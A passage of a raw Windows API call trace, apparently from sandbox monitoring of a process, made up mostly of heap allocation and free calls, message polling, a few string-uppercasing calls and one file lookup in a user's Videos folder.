(HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0213.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0213.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0213.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0213.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0213.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0213.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0213.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0213.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0213.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0213.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0213.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0213.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0213.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0213.751] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0213.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0213.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0213.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0213.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0213.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0213.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0213.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0213.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0213.751] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0213.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0213.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0213.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0213.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0213.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0213.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0213.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0213.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0213.752] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0213.752] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0213.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0213.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0213.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0213.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0213.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0213.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0213.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0213.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0213.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0213.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0213.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0213.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0213.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0213.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0213.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0213.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0213.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0213.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0213.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0213.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0213.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0213.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0213.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0213.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0213.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0213.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0213.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0213.753] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0213.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0213.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0213.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0213.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0213.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0213.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0213.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0213.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0213.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0213.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0213.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0213.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab200 [0213.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0213.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0213.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0213.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0213.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0213.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0213.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0213.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0213.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0213.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0213.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0213.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0213.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0213.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0213.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0213.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0213.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0213.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0213.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0213.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0213.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0213.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0213.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0213.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0213.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0213.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0213.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0213.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0213.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0213.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0213.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0213.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0213.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0213.755] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0213.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0213.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0213.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0213.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0213.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0213.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0213.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0213.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0213.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0213.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0213.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0213.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0213.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0213.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0213.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0213.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0213.755] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0213.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0213.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0213.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0213.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0213.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0213.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0213.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0213.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0213.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0213.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0213.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0213.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0213.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0213.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0213.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0213.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0213.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0213.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0213.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0213.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0213.756] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/RV_dV0DIDgvgK.avi", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7417b320, ftCreationTime.dwHighDateTime=0x1d5cad6, ftLastAccessTime.dwLowDateTime=0x758ee910, ftLastAccessTime.dwHighDateTime=0x1d5d406, ftLastWriteTime.dwLowDateTime=0x758ee910, ftLastWriteTime.dwHighDateTime=0x1d5d406, nFileSizeHigh=0x0, nFileSizeLow=0xeca2, dwReserved0=0x0, dwReserved1=0x0, cFileName="RV_dV0DIDgvgK.avi", cAlternateFileName="RV_DV0~1.AVI")) returned 0x9e1c38 [0213.756] FindClose (in: hFindFile=0x9e1c38 | out: hFindFile=0x9e1c38) returned 1 [0213.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0213.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0213.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0213.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0213.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0213.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0213.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0213.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0213.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0213.757] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0213.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0213.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0213.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0213.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0213.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0213.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0213.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0213.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0213.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0213.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0213.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0213.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0213.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0213.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0213.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0213.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0213.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0213.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0213.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0213.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0213.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0213.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0213.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0213.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0213.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0213.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0213.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0213.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0213.758] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.758] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0213.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0213.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0213.758] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0213.758] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0213.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0213.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0213.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0213.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0213.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0213.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0213.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0213.758] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0213.758] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.758] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0213.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0213.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0213.758] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0213.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0213.758] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0213.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0213.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0213.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0213.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0213.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0213.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0213.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0213.759] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0213.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0213.759] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0213.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0213.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0213.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: 